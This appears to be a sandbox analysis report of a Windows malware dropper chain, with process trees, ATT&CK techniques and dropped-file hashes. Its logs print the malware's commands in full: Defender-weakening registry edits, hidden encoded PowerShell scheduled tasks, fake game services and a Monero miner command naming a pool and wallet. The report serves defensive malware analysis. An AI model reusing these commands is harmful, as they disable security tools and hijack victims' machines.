        Sc stop GameServerClient
        7⤵
        Launches sc.exe
        
        PID:3616
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService remove GameServerClient confirm
        7⤵
        
        PID:356
        
        C:\Windows\SysWOW64\sc.exe
        
        Sc delete GameSyncLink
        7⤵
        Launches sc.exe
        
        PID:332
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService remove GameSyncLink confirm
        7⤵
        
        PID:2236
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService install GameSyncLink "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
        7⤵
        
        PID:3576
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService start GameSyncLink
        7⤵
        
        PID:3732
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Program Files (x86)\GameSyncLink\installc.bat" "
        6⤵
        
        PID:2028
        
        C:\Windows\SysWOW64\sc.exe
        
        Sc stop GameServerClientC
        7⤵
        Launches sc.exe
        
        PID:1436
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService remove GameServerClientC confirm
        7⤵
        
        PID:2768
        
        C:\Windows\SysWOW64\sc.exe
        
        Sc delete PiercingNetLink
        7⤵
        Launches sc.exe
        
        PID:3412
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService remove PiercingNetLink confirm
        7⤵
        
        PID:3480
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService install PiercingNetLink "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
        7⤵
        
        PID:1324
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService start PiercingNetLink
        7⤵
        
        PID:3240
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Program Files (x86)\GameSyncLink\installm.bat" "
        6⤵
        
        PID:1960
        
        C:\Windows\SysWOW64\sc.exe
        
        Sc delete GameSyncLinks
        7⤵
        Launches sc.exe
        
        PID:3308
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService remove GameSyncLinks confirm
        7⤵
        
        PID:1440
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService install GameSyncLinks "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
        7⤵
        
        PID:2276
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService start GameSyncLinks
        7⤵
        
        PID:3948
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
        6⤵
        
        PID:2596
    - - C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe"
        5⤵
        
        PID:3432
      - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe" /F
        6⤵
        Creates scheduled task(s)
        
        PID:3292
      - C:\Users\Admin\AppData\Local\Temp\1000244001\ISetup8.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000244001\ISetup8.exe"
        6⤵
        
        PID:4012
        
        C:\Users\Admin\AppData\Local\Temp\u33g.0.exe
        
        "C:\Users\Admin\AppData\Local\Temp\u33g.0.exe"
        7⤵
        
        PID:2148
        
        C:\Users\Admin\AppData\Local\Temp\u33g.1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\u33g.1.exe"
        7⤵
        
        PID:3076
      - C:\Users\Admin\AppData\Local\Temp\1000245001\toolspub1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000245001\toolspub1.exe"
        6⤵
        
        PID:2500
      - C:\Users\Admin\AppData\Local\Temp\1000246001\4767d2e713f2021e8fe856e3ea638b58.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000246001\4767d2e713f2021e8fe856e3ea638b58.exe"
        6⤵
        
        PID:3988
        
        C:\Users\Admin\AppData\Local\Temp\1000246001\4767d2e713f2021e8fe856e3ea638b58.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000246001\4767d2e713f2021e8fe856e3ea638b58.exe"
        7⤵
        
        PID:1244
    - - C:\Users\Admin\AppData\Local\Temp\1000103001\conhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000103001\conhost.exe"
        5⤵
        
        PID:3620
      - C:\Program Files (x86)\Windows Media Player\wmplayer.exe
        
        "C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
        6⤵
        
        PID:2148
- - C:\Users\Admin\AppData\Local\Temp\1000020001\fe69476dba.exe
    "C:\Users\Admin\AppData\Local\Temp\1000020001\fe69476dba.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Checks whether UAC is enabled
    PID:1072
- - C:\Users\Admin\1000021002\233128b1d4.exe
    "C:\Users\Admin\1000021002\233128b1d4.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:2024
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
      4⤵
      Enumerates system info in registry
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      PID:1800
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7feef5b9758,0x7feef5b9768,0x7feef5b9778
        5⤵
        
        PID:2052
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1144 --field-trial-handle=1496,i,7708937780775877695,15534513128578702911,131072 /prefetch:2
        5⤵
        
        PID:1412
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1424 --field-trial-handle=1496,i,7708937780775877695,15534513128578702911,131072 /prefetch:8
        5⤵
        
        PID:1484
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1596 --field-trial-handle=1496,i,7708937780775877695,15534513128578702911,131072 /prefetch:8
        5⤵
        
        PID:1132
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2276 --field-trial-handle=1496,i,7708937780775877695,15534513128578702911,131072 /prefetch:1
        5⤵
        
        PID:3116
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2288 --field-trial-handle=1496,i,7708937780775877695,15534513128578702911,131072 /prefetch:1
        5⤵
        
        PID:3128
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1944 --field-trial-handle=1496,i,7708937780775877695,15534513128578702911,131072 /prefetch:2
        5⤵
        
        PID:3748
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2440 --field-trial-handle=1496,i,7708937780775877695,15534513128578702911,131072 /prefetch:8
        5⤵
        
        PID:2912

C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240507142551.log C:\Windows\Logs\CBS\CbsPersist_20240507142551.cab
1⤵
PID:2528

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:3136

C:\Program Files (x86)\GameSyncLink\GameService.exe
"C:\Program Files (x86)\GameSyncLink\GameService.exe"
1⤵
PID:3212
- C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe
  "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
  2⤵
  PID:3352
- - C:\Windows\Temp\601987.exe
    "C:\Windows\Temp\601987.exe" --list-devices
    3⤵
    PID:3528

C:\Program Files (x86)\GameSyncLink\GameService.exe
"C:\Program Files (x86)\GameSyncLink\GameService.exe"
1⤵
PID:3972
- C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe
  "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
  2⤵
  PID:608

C:\Program Files (x86)\GameSyncLink\GameService.exe
"C:\Program Files (x86)\GameSyncLink\GameService.exe"
1⤵
PID:3348
- C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe
  "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
  2⤵
  PID:2432
- - C:\Windows\Temp\651409.exe
    "C:\Windows\Temp\651409.exe" --http-port 14343 -o xmr.2miners.com:2222 -u 83dQM82bj4yY83XKGKHnbHTzqgY4FUt2pi1JS15u7rTs8v84mTU5ny5MiRoSeyduBUAQKFZ6MsvbMHYTisNeThDM3BqQ59y --coin XMR -t 1 --no-color -p x
    3⤵
    PID:2528

C:\Windows\system32\taskeng.exe
taskeng.exe {9092F779-92EB-47C0-A6C9-29E2FE5576B1} S-1-5-21-1298544033-3225604241-2703760938-1000:IZKCKOTP\Admin:Interactive:[1]
1⤵
PID:3500
- C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe
  C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe
  2⤵
  PID:924

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\DD45.bat" "
1⤵
PID:3932
- C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
  2⤵
  PID:936

C:\Windows\system32\taskeng.exe
taskeng.exe {E0971B0B-578F-40E8-B55A-E77F111F4584} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:2760
- C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\tLVYvupllyMnDiy\TbzIsJi.exe
  C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\tLVYvupllyMnDiy\TbzIsJi.exe it /VHKdidRqpC 385118 /S
  2⤵
  PID:2440
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    3⤵
    PID:1388
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
      4⤵
      PID:3480
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        
        PID:2016
      - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        6⤵
        
        PID:3728
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
      4⤵
      PID:3456
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        
        PID:3964
      - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        6⤵
        
        PID:2692
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
      4⤵
      PID:4044
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        
        PID:2212
      - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        6⤵
        
        PID:4016
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
      4⤵
      PID:636
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        5⤵
        
        PID:2136
      - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        6⤵
        
        PID:1368
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
      4⤵
      PID:2548
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        5⤵
        
        PID:2180
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2656
        
        C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        7⤵
        
        PID:3776
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gbCFjxgCG" /SC once /ST 05:51:20 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - Creates scheduled task(s)
    PID:1916
- C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\tLVYvupllyMnDiy\TbzIsJi.exe
  C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\tLVYvupllyMnDiy\TbzIsJi.exe it /VHKdidRqpC 385118 /S
  2⤵
  PID:3364
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    3⤵
    PID:924
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
      4⤵
      PID:2168
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        
        PID:2340
      - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        6⤵
        
        PID:1348
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
      4⤵
      PID:700
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        
        PID:3632
      - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        6⤵
        
        PID:3548
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
      4⤵
      PID:3276
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        
        PID:2504
      - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        6⤵
        
        PID:3872
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
      4⤵
      PID:2244
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        5⤵
        
        PID:3060
      - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        6⤵
        
        PID:3584
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
      4⤵
      PID:2584
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        5⤵
        
        PID:3180
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3192
        
        C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        7⤵
        
        PID:3596

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\FFA4.bat" "
1⤵
PID:4012
- C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
  2⤵
  PID:3576

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Virtualization/Sandbox Evasion

T1497

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\GameSyncLink\installc.bat

Filesize
301B

MD5
998ab24316795f67c26aca0f1b38c8ce

SHA1
a2a6dc94e08c086fe27f8c08cb8178e7a64f200d

SHA256
a468b43795f1083fb37b12787c5ff29f8117c26ac35af470084e00c48280442e

SHA512
7c9c2ade898a8defb6510ddd15730bec859d4474071eb6b8e8738ea6089764f81924ad2a6ebf0479d4fed7d61890edaa38f4bfbf70a4e6b30d33aa5bfc5b5c75

Download Submit
C:\Program Files (x86)\GameSyncLink\installg.bat

Filesize
284B

MD5
5dee3cbf941c5dbe36b54690b2a3c240

SHA1
82b9f1ad3ca523f3794e052f7e67ecdcd1ae87e1

SHA256
98370b86626b8fd7a7cac96693348045b081326c49e2421113f49a5ea3588edb

SHA512
9ee431d485e2f09268a22b287b0960859d2f22db8c7e61309a042999c436b3de74f5d75837b739e01122a796ad65bc6468d009ec6ddf4962f4ff288155410556

Download Submit
C:\Program Files (x86)\GameSyncLink\installm.bat

Filesize
218B

MD5
94b87b86dc338b8f0c4e5869496a8a35

SHA1
2584e6496d048068f61ac72f5c08b54ad08627c3

SHA256
2928d8e9a41f39d3802cfd2900d8edeb107666baa942d9c0ffbfd0234b5e5bfc

SHA512
b67eb73fe51d4dba990789f1e0123e902dac6d26569851c3d51ca0a575221ce317f973999d962669016017d8f81a01f11bd977609e66bb1b244334bce2db5d5d

Download Submit
C:\Users\Admin\1000021002\233128b1d4.exe

Filesize
1.1MB

MD5
c5dd5475bc218dbda4deea731e810233

SHA1
1a88e294e93d9dbf4a61b37909e928f214d55d42

SHA256
648526e314d83f92e167f78cb551338f10f713b9d9e7a2eeb1d5785a3b2a2a76

SHA512
1c5b4b3c4191b19f65ad03529fef6d233dd5de19015d97401db64adb30026f15f6d168b4e81177eb3c60c31e50ca8919c20283f5b8c8ade961b05846ad0aca0a

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
9bb73db8cb9b1b7158d3db6bbe3cb77a

SHA1
f72752a02a219929eff154711a804a6a0cca4c9a

SHA256
7d4877f12c109a615e85d97687f31ba492ac59b3a73d825ed497b2b56848b6e6

SHA512
b97dde0587e90f6994ab5812697c829a0945ca9926bf92cade2537601c5725226fcb81813379930dfbd0432f062b780cffd59d3184951f53e0326480d9df0d44

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
d71a4ee5610e723b2d5d038a90a8a56d

SHA1
0942f4befeb2d17d8ba228afeadae5aee4bc8e6d

SHA256
75bb55354124c7958196c29b462554ca4f9ac498e7f11973e08608adc9ecc027

SHA512
403c72d195988a6b010f6af99bc6f95a9dde49fd8c6652f1168ada978d944611693edc8e92b528fc20cc9b9f4579830924c897ca0cf2bd37563fddb6c5f4bef6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\07f9de78-c8c1-4196-ab9a-ce77b8e24e68.tmp

Filesize
6KB

MD5
ece80d4178a2b90a61ebe03af17087ea

SHA1
fd47b2c898ef8867b9a1d7bf2a8a6f712d4f6ba9

SHA256
2d97dd67e8d4a2a5229a1841efbb5023b8c51d3e041264f4df230eb0fa37b03a

SHA512
293f21d14b03a6fd7d78371c14832ae0ff3a7a75243d383652b59a501988225584342f72a3ff74a7f345fd19b9481e864dc5a8a62cbe0b9edfe1c0cc42f1052a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1

Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
986B

MD5
0af7cbef13dca00c06230d4648205539

SHA1
59324260be5727dd8cef2b743da9d0b564a99a7d

SHA256
d34f4e48c4a75c0c955ca92c9cd82807ac62b242677d2494f2039be438956627

SHA512
5ffb9748f900ee24a94a0f913528e4443b2ea00e5603fc7abc61403c2b1178bb35ab3d647f40c457c81dc4209d72f878b84854d6348c265a42af6fb0c2e83700

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
5KB

MD5
7610512f1da44581520632e10ded3a72

SHA1
325766955b68dba49e56525bbb16cf3748025d6a

SHA256
7eb06b23a7d83afcc8844dd07bcbbb7255ded1668149f610dad30186feddb355

SHA512
